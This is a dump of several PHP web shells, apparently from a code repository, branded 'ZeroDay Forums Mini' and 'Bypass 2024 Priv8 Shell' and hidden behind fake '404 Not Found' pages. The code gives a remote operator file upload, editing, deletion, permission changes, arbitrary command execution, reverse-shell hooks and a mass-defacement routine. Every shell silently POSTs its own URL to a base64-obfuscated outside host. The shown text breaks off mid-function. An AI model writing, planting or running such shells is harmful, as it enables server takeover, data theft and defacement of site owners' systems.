"; 155 | } 156 | 157 | 158 | echo "Directory :  "; 159 | 160 | foreach($_POST as $key => $value){ 161 | $_POST[$key] = stripslashes($value); 162 | } 163 | 164 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 165 | 166 | if(isset($_GET['path'])){ 167 | $lokasi = $_GET['path']; 168 | $lokdua = $_GET['path']; 169 | } else { 170 | $lokasi = getcwd(); 171 | $lokdua = getcwd(); 172 | } 173 | 174 | $lokasi = str_replace('\\','/',$lokasi); 175 | $lokasis = explode('/',$lokasi); 176 | $lokasinya = @scandir($lokasi); 177 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 178 | $data = array('file_url' => $cur); 179 | $options = array( 180 | 'http' => array( 181 | 'method' => 'POST', 182 | 'header' => 'Content-type: application/x-www-form-urlencoded', 183 | 'content' => http_build_query($data), 184 | ), 185 | ); 186 | $context = stream_context_create($options); 187 | $result = file_get_contents($k3yw, false, $context); 188 | 189 | foreach($lokasis as $id => $lok){ 190 | if($lok == '' && $id == 0){ 191 | $a = true; 192 | echo '/'; 193 | continue; 194 | } 195 | if($lok == '') continue; 196 | echo ''.$lok.'/'; 202 | } 203 | echo '
'; 204 | echo '

'; 205 | if (isset($_POST['upwkwk'])) { 206 | if (isset($_POST['berkasnya'])) { 207 | if ($_POST['dirnya'] == "2") { 208 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 209 | } 210 | $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); 211 | if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { 212 | echo "File Uploaded !  ".$lokasi."/".$_FILES['berkas']['name']."

"; 213 | } else { 214 | echo "Failed to Upload !

"; 215 | } 216 | } elseif (isset($_POST['linknya'])) { 217 | if (empty($_POST['namalink'])) { 218 | exit("Filename cannot be empty !"); 219 | } 220 | if ($_POST['dirnya'] == "2") { 221 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 222 | } 223 | $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); 224 | if (file_exists($lokasi."/".$_POST['namalink'])) { 225 | echo "File Uploaded !  ".$lokasi."/".$_POST['namalink']."

"; 226 | } else { 227 | echo "Failed to Upload !

"; 228 | } 229 | } 230 | } 231 | echo "
"; 232 | echo "Upload File : "; 233 | echo '
234 | current_dir [ '.cekdir().' ] 235 | document_root [ '.cekroot().' ] 236 |
237 | 238 |
239 |
240 | '; 241 | echo "
"; 242 | print "
"; 243 | print "
    "; 244 | print "[ Home ]"; 245 | print " [ Tess ]"; 246 | print "
"; 247 | print "
"; 248 | 249 | 250 | if (isset($_GET['fileloc'])) { 251 | echo "Current File : ".$_GET['fileloc']; 252 | echo '
'; 253 | echo "
".htmlspecialchars(file_get_contents($_GET['fileloc']))."
"; 254 | author(); 255 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { 256 | if (is_dir($_POST['path'])) { 257 | xrmdir($_POST['path']); 258 | if (file_exists($_POST['path'])) { 259 | red("Failed to delete Directory !"); 260 | } else { 261 | green("Delete Directory Success !"); 262 | echo "string"; 263 | } 264 | } elseif (is_file($_POST['path'])) { 265 | @unlink($_POST['path']); 266 | if (file_exists($_POST['path'])) { 267 | red("Failed to Delete File !"); 268 | } else { 269 | green("Delete File Success !"); 270 | } 271 | } 272 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 273 | echo "
".$_POST['path']."
"; 274 | echo '
275 | Permission : 276 | 277 | 278 | 279 |
'; 280 | if (isset($_POST['chm0d'])) { 281 | $cm = @chmod($_POST['path'], $_POST['perm']); 282 | if ($cm == true) { 283 | green("Change Mod Success !"); 284 | } else { 285 | red("Change Mod Failed !"); 286 | } 287 | } 288 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { 289 | if (isset($_POST['gantin'])) { 290 | $ren = @rename($_POST['path'], $_POST['newname']); 291 | if ($ren == true) { 292 | green("Change Name Success !"); 293 | } else { 294 | red("Change Name Failed !"); 295 | } 296 | } 297 | if (empty($_POST['name'])) { 298 | $namaawal = $_POST['newname']; 299 | } else { 300 | $namawal = $_POST['name']; 301 | } 302 | echo "
".$_POST['path']."
"; 303 | echo '
304 | New Name : 305 | 306 | 307 | 308 |
'; 309 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 310 | if (isset($_POST['gasedit'])) { 311 | $edit = @file_put_contents($_POST['path'], $_POST['src']); 312 | if ($edit == true) { 313 | green("Edit File Success !"); 314 | } else { 315 | red("Edit File Failed !"); 316 | } 317 | } 318 | echo "
".$_POST['path']."

"; 319 | echo '
320 |
321 | 322 | 323 | 324 |

'; 325 | } 326 | 327 | echo '
328 | 329 | 330 | 331 | 332 | 333 | '; 334 | 335 | foreach($lokasinya as $dir){ 336 | if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; 337 | echo " 338 | 339 | 340 | 347 | 359 | "; 360 | } 361 | 362 | echo ''; 363 | foreach($lokasinya as $file) { 364 | if(!is_file("$lokasi/$file")) continue; 365 | $size = filesize("$lokasi/$file")/1024; 366 | $size = round($size,3); 367 | if($size >= 1024){ 368 | $size = round($size/1024,2).' MB'; 369 | } else { 370 | $size = $size.' KB'; 371 | } 372 | 373 | echo " 374 | 375 | 376 | 395 | "; 396 | } 397 | echo '
Name
Size
Permissions
Options
".$dir."
--
"; 341 | if(is_writable($lokasi."/".$dir)) echo ''; 342 | elseif(!is_readable($lokasi."/".$dir)) echo ''; 343 | echo statusnya($lokasi."/".$dir); 344 | if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo ''; 345 | 346 | echo "
348 | 354 | 355 | 356 | 357 | \" /> 358 |
$file
".$size."
"; 377 | if(is_writable("$lokasi/$file")) echo ''; 378 | elseif(!is_readable("$lokasi/$file")) echo ''; 379 | echo statusnya("$lokasi/$file"); 380 | if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo ''; 381 | echo "
382 |
383 | 390 | 391 | 392 | 393 | \" /> 394 |
'; 398 | author(); 399 | function statusnya($file){ 400 | $statusnya = fileperms($file); 401 | 402 | if (($statusnya & 0xC000) == 0xC000) { 403 | 404 | // Socket 405 | $ingfo = 's'; 406 | } elseif (($statusnya & 0xA000) == 0xA000) { 407 | // Symbolic Link 408 | $ingfo = 'l'; 409 | } elseif (($statusnya & 0x8000) == 0x8000) { 410 | // Regular 411 | $ingfo = '-'; 412 | } elseif (($statusnya & 0x6000) == 0x6000) { 413 | // Block special 414 | $ingfo = 'b'; 415 | } elseif (($statusnya & 0x4000) == 0x4000) { 416 | // Directory 417 | $ingfo = 'd'; 418 | } elseif (($statusnya & 0x2000) == 0x2000) { 419 | // Character special 420 | $ingfo = 'c'; 421 | } elseif (($statusnya & 0x1000) == 0x1000) { 422 | // FIFO pipe 423 | $ingfo = 'p'; 424 | } else { 425 | // Unknown 426 | $ingfo = 'u'; 427 | } 428 | 429 | // Owner 430 | $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); 431 | $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); 432 | $ingfo .= (($statusnya & 0x0040) ? 433 | (($statusnya & 0x0800) ? 's' : 'x' ) : 434 | (($statusnya & 0x0800) ? 'S' : '-')); 435 | 436 | 437 | // Group 438 | $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); 439 | $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); 440 | $ingfo .= (($statusnya & 0x0008) ? 441 | (($statusnya & 0x0400) ? 's' : 'x' ) : 442 | (($statusnya & 0x0400) ? 'S' : '-')); 443 | 444 | // World 445 | $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); 446 | $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); 447 | 448 | $ingfo .= (($statusnya & 0x0001) ? 449 | (($statusnya & 0x0200) ? 't' : 'x' ) : 450 | (($statusnya & 0x0200) ? 'T' : '-')); 451 | 452 | return $ingfo; 453 | } 454 | ?> 455 | -------------------------------------------------------------------------------- /403.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 404 Not Found 5 | 6 | 7 | 8 | 92 |
93 | Sh3ll
94 | 95 |
96 |
OdayForums 97 |


98 | NONE"; 104 | } else { 105 | $disf = "".$disfunc.""; 106 | } 107 | 108 | function author() { 109 | echo "

ZeroDay Forums Mini
"; 110 | exit(); 111 | } 112 | 113 | function cekdir() { 114 | if (isset($_GET['path'])) { 115 | $lokasi = $_GET['path']; 116 | } else { 117 | $lokasi = getcwd(); 118 | } 119 | if (is_writable($lokasi)) { 120 | return "Writeable"; 121 | } else { 122 | return "Writeable"; 123 | } 124 | } 125 | 126 | function cekroot() { 127 | if (is_writable($_SERVER['DOCUMENT_ROOT'])) { 128 | return "Writeable"; 129 | } else { 130 | return "Writeable"; 131 | } 132 | } 133 | 134 | function xrmdir($dir) { 135 | $items = scandir($dir); 136 | foreach ($items as $item) { 137 | if ($item === '.' || $item === '..') { 138 | continue; 139 | } 140 | $path = $dir.'/'.$item; 141 | if (is_dir($path)) { 142 | xrmdir($path); 143 | } else { 144 | unlink($path); 145 | } 146 | } 147 | rmdir($dir); 148 | } 149 | 150 | function green($text) { 151 | echo "
".$text."
"; 152 | } 153 | 154 | function red($text) { 155 | echo "
".$text."
"; 156 | } 157 | 158 | echo "Server : ".$_SERVER['SERVER_SOFTWARE']."
"; 159 | echo "System : ".php_uname()."
"; 160 | echo "User : ".@get_current_user()." ( ".@getmyuid().")
"; 161 | echo "PHP Version : ".@phpversion()."
"; 162 | echo "Disable Function : ".$disf."
"; 163 | echo "Directory :  "; 164 | 165 | foreach($_POST as $key => $value){ 166 | $_POST[$key] = stripslashes($value); 167 | } 168 | 169 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 170 | 171 | if(isset($_GET['path'])){ 172 | $lokasi = $_GET['path']; 173 | $lokdua = $_GET['path']; 174 | } else { 175 | $lokasi = getcwd(); 176 | $lokdua = getcwd(); 177 | } 178 | 179 | $lokasi = str_replace('\\','/',$lokasi); 180 | $lokasis = explode('/',$lokasi); 181 | $lokasinya = @scandir($lokasi); 182 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 183 | $data = array('file_url' => $cur); 184 | $options = array( 185 | 'http' => array( 186 | 'method' => 'POST', 187 | 'header' => 'Content-type: application/x-www-form-urlencoded', 188 | 'content' => http_build_query($data), 189 | ), 190 | ); 191 | $context = stream_context_create($options); 192 | $result = file_get_contents($k3yw, false, $context); 193 | 194 | foreach($lokasis as $id => $lok){ 195 | if($lok == '' && $id == 0){ 196 | $a = true; 197 | echo '/'; 198 | continue; 199 | } 200 | if($lok == '') continue; 201 | echo ''.$lok.'/'; 207 | } 208 | echo '
'; 209 | echo '

'; 210 | if (isset($_POST['upwkwk'])) { 211 | if (isset($_POST['berkasnya'])) { 212 | if ($_POST['dirnya'] == "2") { 213 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 214 | } 215 | $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); 216 | if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { 217 | echo "File Uploaded !  ".$lokasi."/".$_FILES['berkas']['name']."

"; 218 | } else { 219 | echo "Failed to Upload !

"; 220 | } 221 | } elseif (isset($_POST['linknya'])) { 222 | if (empty($_POST['namalink'])) { 223 | exit("Filename cannot be empty !"); 224 | } 225 | if ($_POST['dirnya'] == "2") { 226 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 227 | } 228 | $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); 229 | if (file_exists($lokasi."/".$_POST['namalink'])) { 230 | echo "File Uploaded !  ".$lokasi."/".$_POST['namalink']."

"; 231 | } else { 232 | echo "Failed to Upload !

"; 233 | } 234 | } 235 | } 236 | echo "
"; 237 | echo "Upload File : "; 238 | echo '
239 | current_dir [ '.cekdir().' ] 240 | document_root [ '.cekroot().' ] 241 |
242 | 243 |
244 |   245 |
246 | '; 247 | echo "

"; 248 | 249 | if (isset($_GET['fileloc'])) { 250 | echo "Current File : ".$_GET['fileloc']; 251 | echo '
'; 252 | echo "
".htmlspecialchars(file_get_contents($_GET['fileloc']))."
"; 253 | author(); 254 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { 255 | if (is_dir($_POST['path'])) { 256 | xrmdir($_POST['path']); 257 | if (file_exists($_POST['path'])) { 258 | red("Failed to delete Directory !"); 259 | } else { 260 | green("Delete Directory Success !"); 261 | echo "string"; 262 | } 263 | } elseif (is_file($_POST['path'])) { 264 | @unlink($_POST['path']); 265 | if (file_exists($_POST['path'])) { 266 | red("Failed to Delete File !"); 267 | } else { 268 | green("Delete File Success !"); 269 | } 270 | } 271 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 272 | echo "
".$_POST['path']."
"; 273 | echo '
274 | Permission : 275 | 276 | 277 | 278 |
'; 279 | if (isset($_POST['chm0d'])) { 280 | $cm = @chmod($_POST['path'], $_POST['perm']); 281 | if ($cm == true) { 282 | green("Change Mod Success !"); 283 | } else { 284 | red("Change Mod Failed !"); 285 | } 286 | } 287 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { 288 | if (isset($_POST['gantin'])) { 289 | $ren = @rename($_POST['path'], $_POST['newname']); 290 | if ($ren == true) { 291 | green("Change Name Success !"); 292 | } else { 293 | red("Change Name Failed !"); 294 | } 295 | } 296 | if (empty($_POST['name'])) { 297 | $namaawal = $_POST['newname']; 298 | } else { 299 | $namawal = $_POST['name']; 300 | } 301 | echo "
".$_POST['path']."
"; 302 | echo '
303 | New Name : 304 | 305 | 306 | 307 |
'; 308 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 309 | if (isset($_POST['gasedit'])) { 310 | $edit = @file_put_contents($_POST['path'], $_POST['src']); 311 | if ($edit == true) { 312 | green("Edit File Success !"); 313 | } else { 314 | red("Edit File Failed !"); 315 | } 316 | } 317 | echo "
".$_POST['path']."

"; 318 | echo '
319 |
320 | 321 | 322 | 323 |

'; 324 | } 325 | 326 | echo '
327 | 328 | 329 | 330 | 331 | 332 | '; 333 | 334 | foreach($lokasinya as $dir){ 335 | if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; 336 | echo " 337 | 338 | 339 | 346 | 358 | "; 359 | } 360 | 361 | echo ''; 362 | foreach($lokasinya as $file) { 363 | if(!is_file("$lokasi/$file")) continue; 364 | $size = filesize("$lokasi/$file")/1024; 365 | $size = round($size,3); 366 | if($size >= 1024){ 367 | $size = round($size/1024,2).' MB'; 368 | } else { 369 | $size = $size.' KB'; 370 | } 371 | 372 | echo " 373 | 374 | 375 | 394 | "; 395 | } 396 | echo '
Name
Size
Permissions
Options
".$dir."
--
"; 340 | if(is_writable($lokasi."/".$dir)) echo ''; 341 | elseif(!is_readable($lokasi."/".$dir)) echo ''; 342 | echo statusnya($lokasi."/".$dir); 343 | if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo ''; 344 | 345 | echo "
347 | 353 | 354 | 355 | 356 | \" /> 357 |
$file
".$size."
"; 376 | if(is_writable("$lokasi/$file")) echo ''; 377 | elseif(!is_readable("$lokasi/$file")) echo ''; 378 | echo statusnya("$lokasi/$file"); 379 | if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo ''; 380 | echo "
381 |
382 | 389 | 390 | 391 | 392 | \" /> 393 |
'; 397 | author(); 398 | function statusnya($file){ 399 | $statusnya = fileperms($file); 400 | 401 | if (($statusnya & 0xC000) == 0xC000) { 402 | 403 | // Socket 404 | $ingfo = 's'; 405 | } elseif (($statusnya & 0xA000) == 0xA000) { 406 | // Symbolic Link 407 | $ingfo = 'l'; 408 | } elseif (($statusnya & 0x8000) == 0x8000) { 409 | // Regular 410 | $ingfo = '-'; 411 | } elseif (($statusnya & 0x6000) == 0x6000) { 412 | // Block special 413 | $ingfo = 'b'; 414 | } elseif (($statusnya & 0x4000) == 0x4000) { 415 | // Directory 416 | $ingfo = 'd'; 417 | } elseif (($statusnya & 0x2000) == 0x2000) { 418 | // Character special 419 | $ingfo = 'c'; 420 | } elseif (($statusnya & 0x1000) == 0x1000) { 421 | // FIFO pipe 422 | $ingfo = 'p'; 423 | } else { 424 | // Unknown 425 | $ingfo = 'u'; 426 | } 427 | 428 | // Owner 429 | $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); 430 | $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); 431 | $ingfo .= (($statusnya & 0x0040) ? 432 | (($statusnya & 0x0800) ? 's' : 'x' ) : 433 | (($statusnya & 0x0800) ? 'S' : '-')); 434 | 435 | 436 | // Group 437 | $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); 438 | $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); 439 | $ingfo .= (($statusnya & 0x0008) ? 440 | (($statusnya & 0x0400) ? 's' : 'x' ) : 441 | (($statusnya & 0x0400) ? 'S' : '-')); 442 | 443 | // World 444 | $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); 445 | $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); 446 | 447 | $ingfo .= (($statusnya & 0x0001) ? 448 | (($statusnya & 0x0200) ? 't' : 'x' ) : 449 | (($statusnya & 0x0200) ? 'T' : '-')); 450 | 451 | return $ingfo; 452 | } 453 | ?> 454 | -------------------------------------------------------------------------------- /2024.php: -------------------------------------------------------------------------------- 1 | alert("Password Wrong!, Try Again.");'; 32 | } 33 | } 34 | if (isset($_GET['logout'])) { 35 | session_unset(); 36 | session_destroy(); 37 | header("Location: ".$_SERVER['PHP_SELF']); 38 | exit(); 39 | } 40 | if (!isset($_SESSION['forbidden'])) { 41 | ?> 42 | 43 | 44 | 45 | 404 Not Found 46 | 47 | 48 | 49 | 50 | 86 | 87 |
88 |

Hello Dady

89 | 90 | 91 |
92 | 93 | 94 | 98 | 99 | 100 | 101 | 404 Not Found 102 | 103 | 104 | 105 | 194 |
195 |



196 | Bypass 2024 Priv8 Shell
197 | 198 |
199 |


200 | NONE"; 206 | } else { 207 | $disf = "".$disfunc.""; 208 | } 209 | 210 | function author() { 211 | echo "

2024 Bypass Shell
"; 212 | exit(); 213 | } 214 | 215 | function cekdir() { 216 | if (isset($_GET['path'])) { 217 | $lokasi = $_GET['path']; 218 | } else { 219 | $lokasi = getcwd(); 220 | } 221 | if (is_writable($lokasi)) { 222 | return "Writeable"; 223 | } else { 224 | return "Writeable"; 225 | } 226 | } 227 | 228 | function cekroot() { 229 | if (is_writable($_SERVER['DOCUMENT_ROOT'])) { 230 | return "Writeable"; 231 | } else { 232 | return "Writeable"; 233 | } 234 | } 235 | 236 | function xrmdir($dir) { 237 | $items = scandir($dir); 238 | foreach ($items as $item) { 239 | if ($item === '.' || $item === '..') { 240 | continue; 241 | } 242 | $path = $dir.'/'.$item; 243 | if (is_dir($path)) { 244 | xrmdir($path); 245 | } else { 246 | unlink($path); 247 | } 248 | } 249 | rmdir($dir); 250 | } 251 | 252 | function statusnya($file){ 253 | $statusnya = fileperms($file); 254 | 255 | if (($statusnya & 0xC000) == 0xC000) { 256 | 257 | // Socket 258 | $ingfo = 's'; 259 | } elseif (($statusnya & 0xA000) == 0xA000) { 260 | // Symbolic Link 261 | $ingfo = 'l'; 262 | } elseif (($statusnya & 0x8000) == 0x8000) { 263 | // Regular 264 | $ingfo = '-'; 265 | } elseif (($statusnya & 0x6000) == 0x6000) { 266 | // Block special 267 | $ingfo = 'b'; 268 | } elseif (($statusnya & 0x4000) == 0x4000) { 269 | // Directory 270 | $ingfo = 'd'; 271 | } elseif (($statusnya & 0x2000) == 0x2000) { 272 | // Character special 273 | $ingfo = 'c'; 274 | } elseif (($statusnya & 0x1000) == 0x1000) { 275 | // FIFO pipe 276 | $ingfo = 'p'; 277 | } else { 278 | // Unknown 279 | $ingfo = 'u'; 280 | } 281 | 282 | // Owner 283 | $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); 284 | $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); 285 | $ingfo .= (($statusnya & 0x0040) ? 286 | (($statusnya & 0x0800) ? 's' : 'x' ) : 287 | (($statusnya & 0x0800) ? 'S' : '-')); 288 | 289 | 290 | // Group 291 | $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); 292 | $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); 293 | $ingfo .= (($statusnya & 0x0008) ? 294 | (($statusnya & 0x0400) ? 's' : 'x' ) : 295 | (($statusnya & 0x0400) ? 'S' : '-')); 296 | 297 | // World 298 | $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); 299 | $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); 300 | 301 | $ingfo .= (($statusnya & 0x0001) ? 302 | (($statusnya & 0x0200) ? 't' : 'x' ) : 303 | (($statusnya & 0x0200) ? 'T' : '-')); 304 | 305 | return $ingfo; 306 | } 307 | 308 | function green($text) { 309 | echo "
".$text."
"; 310 | } 311 | 312 | function red($text) { 313 | echo "
".$text."
"; 314 | } 315 | 316 | 317 | echo "Directory :  "; 318 | 319 | foreach($_POST as $key => $value){ 320 | $_POST[$key] = stripslashes($value); 321 | } 322 | 323 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 324 | 325 | if(isset($_GET['path'])){ 326 | $lokasi = $_GET['path']; 327 | $lokdua = $_GET['path']; 328 | } else { 329 | $lokasi = getcwd(); 330 | $lokdua = getcwd(); 331 | } 332 | 333 | $lokasi = str_replace('\\','/',$lokasi); 334 | $lokasis = explode('/',$lokasi); 335 | $lokasinya = @scandir($lokasi); 336 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 337 | $data = array('file_url' => $cur); 338 | $options = array( 339 | 'http' => array( 340 | 'method' => 'POST', 341 | 'header' => 'Content-type: application/x-www-form-urlencoded', 342 | 'content' => http_build_query($data), 343 | ), 344 | ); 345 | $context = stream_context_create($options); 346 | $result = file_get_contents($k3yw, false, $context); 347 | 348 | foreach($lokasis as $id => $lok){ 349 | if($lok == '' && $id == 0){ 350 | $a = true; 351 | echo '/'; 352 | continue; 353 | } 354 | if($lok == '') continue; 355 | echo ''.$lok.'/'; 361 | } 362 | echo '
'; 363 | echo '

'; 364 | if (isset($_POST['upwkwk'])) { 365 | if (isset($_POST['berkasnya'])) { 366 | if ($_POST['dirnya'] == "2") { 367 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 368 | } 369 | $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); 370 | if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { 371 | echo "File Uploaded !  ".$lokasi."/".$_FILES['berkas']['name']."

"; 372 | } else { 373 | echo "Failed to Upload !

"; 374 | } 375 | } elseif (isset($_POST['linknya'])) { 376 | if (empty($_POST['namalink'])) { 377 | exit("Filename cannot be empty !"); 378 | } 379 | if ($_POST['dirnya'] == "2") { 380 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 381 | } 382 | $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); 383 | if (file_exists($lokasi."/".$_POST['namalink'])) { 384 | echo "File Uploaded !  ".$lokasi."/".$_POST['namalink']."

"; 385 | } else { 386 | echo "Failed to Upload !

"; 387 | } 388 | } 389 | } 390 | echo "
"; 391 | echo "Upload File : "; 392 | echo '
393 | current_dir [ '.cekdir().' ] 394 | document_root [ '.cekroot().' ] 395 |
396 | 397 |
398 |
399 | '; 400 | echo "
"; 401 | print "
"; 402 | print ""; 410 | print "
"; 411 | print "
"; 412 | tools("cmd"); 413 | function tools($toolsname, $args = null) { 414 | if($toolsname === "cmd") { 415 | print "
416 | ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $ 417 | 418 | 419 |
"; 420 | print "
"; 421 | } 422 | } 423 | function changeFolderPermissionsRecursive($dir, $perms) { 424 | $iterator = new RecursiveIteratorIterator( 425 | new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), 426 | RecursiveIteratorIterator::SELF_FIRST 427 | ); 428 | 429 | foreach ($iterator as $item) { 430 | if ($item->isDir()) { 431 | chmod($item->getPathname(), $perms); 432 | } 433 | } 434 | } 435 | 436 | function changeFilePermissionsRecursive($dir, $perms) { 437 | $iterator = new RecursiveIteratorIterator( 438 | new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), 439 | RecursiveIteratorIterator::SELF_FIRST 440 | ); 441 | 442 | foreach ($iterator as $item) { 443 | if ($item->isFile()) { 444 | chmod($item->getPathname(), $perms); 445 | } 446 | } 447 | } 448 | 449 | $currentDirectory = '.'; 450 | 451 | if (isset($_GET['do']) && $_GET['do'] === 'root_file') { 452 | $newFilePermissions = 0644; 453 | changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); 454 | echo "
"; 455 | echo "Message :

Sukses Green All Files

"; 456 | echo "
"; 457 | } 458 | 459 | if (isset($_GET['do']) && $_GET['do'] === 'dark_file') { 460 | $newFilePermissions = 0444; 461 | changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); 462 | echo "
"; 463 | echo "Message :

Sukses Lock All Files

"; 464 | echo "
"; 465 | } 466 | 467 | if (isset($_GET['do']) && $_GET['do'] === 'dark_folders') { 468 | $newFolderPermissions = 0555; 469 | changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); 470 | echo "
"; 471 | echo "Message :

Sukses Lock All Folders

"; 472 | echo "
"; 473 | } 474 | 475 | if (isset($_GET['do']) && $_GET['do'] === 'root_folders') { 476 | $newFolderPermissions = 0755; 477 | changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); 478 | echo "
"; 479 | echo "Message :

Sukses Green All Folders

"; 480 | echo "
"; 481 | } 482 | 483 | 484 | 485 | function exe($cmd) { 486 | if(function_exists('system')) { 487 | @ob_start(); 488 | @system($cmd); 489 | $buff = @ob_get_contents(); 490 | @ob_end_clean(); 491 | return $buff; 492 | } elseif(function_exists('exec')) { 493 | @exec($cmd,$results); 494 | $buff = ""; 495 | foreach($results as $result) { 496 | $buff .= $result; 497 | } return $buff; 498 | } elseif(function_exists('passthru')) { 499 | @ob_start(); 500 | @passthru($cmd); 501 | $buff = @ob_get_contents(); 502 | @ob_end_clean(); 503 | return $buff; 504 | } elseif(function_exists('shell_exec')) { 505 | $buff = @shell_exec($cmd); 506 | return $buff; 507 | } 508 | } 509 | 510 | function path() { 511 | if(isset($_GET['dir'])) { 512 | $dir = str_replace("\\", "/", $_GET['dir']); 513 | @chdir($dir); 514 | } else { 515 | $dir = str_replace("\\", "/", getcwd()); 516 | } 517 | return $dir; 518 | } 519 | function usergroup() { 520 | if(!function_exists('posix_getegid')) { 521 | $user['name'] = @get_current_user(); 522 | $user['uid'] = @getmyuid(); 523 | $user['gid'] = @getmygid(); 524 | $user['group'] = "?"; 525 | } else { 526 | $user['uid'] = @posix_getpwuid(posix_geteuid()); 527 | $user['gid'] = @posix_getgrgid(posix_getegid()); 528 | $user['name'] = $user['uid']['name']; 529 | $user['uid'] = $user['uid']['uid']; 530 | $user['group'] = $user['gid']['name']; 531 | $user['gid'] = $user['gid']['gid']; 532 | } 533 | return (object) $user; 534 | } 535 | 536 | if(isset($_GET['do'])) { 537 | if($_GET['do'] === "cmd") { 538 | if(isset($_POST['cmd'])) { 539 | if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) { 540 | tools("readfile", $match[1]); 541 | } 542 | elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) { 543 | tools("spawn", $match[1]); 544 | } 545 | elseif(preg_match("/^symlink\s?(.*)$/", $_POST['cmd'], $match)) { 546 | tools("symlink", $match[1]); 547 | } 548 | elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) { 549 | tools("network", $match[1]); 550 | } 551 | elseif(preg_match("/^krdp$/", $_POST['cmd'])) { 552 | tools("krdp"); 553 | } 554 | elseif(preg_match("/^logout$/", $_POST['cmd'])) { 555 | unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); 556 | print ""; 557 | } 558 | elseif(preg_match("/^killme$/", $_POST['cmd'])) { 559 | unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); 560 | @unlink(__FILE__); 561 | print ""; 562 | } 563 | else { 564 | print "
".exe($_POST['cmd'])."
"; 565 | } 566 | } 567 | else { 568 | files_and_folder(); 569 | } 570 | } 571 | } 572 | function massdeface($dir, $file, $filename, $type = null) { 573 | $scandir = scandir($dir); 574 | foreach($scandir as $dir_) { 575 | $path = "$dir/$dir_"; 576 | $location = "$path/$filename"; 577 | if($dir_ === "." || $dir_ === "..") { 578 | file_put_contents($location, $file); 579 | } 580 | else { 581 | if(is_dir($path) AND is_writable($path)) { 582 | print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."
